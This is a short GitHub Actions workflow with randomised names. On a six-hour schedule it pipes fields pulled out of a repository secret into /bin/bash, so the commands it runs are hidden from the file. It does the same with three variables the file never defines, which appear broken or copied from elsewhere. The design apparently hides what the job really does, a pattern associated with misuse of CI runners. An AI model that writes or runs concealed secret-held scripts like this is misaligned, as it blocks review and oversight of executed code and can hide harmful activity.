name: zengkaimen3819
on:
  workflow_dispatch:
  schedule:
    - cron: '10 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zengkaimen3819
        env:
          mksf3132: ${{ secrets.mksf3132 }}
        run: |
          echo $mksf3132 | jq -r .c45664 | /bin/bash
          echo $yy13230 | jq -r .fkb5 | /bin/bash
          echo $gyis32054 | jq -r .r2325 | /bin/bash
          echo $bdxm946 | jq -r .p72 | /bin/bash

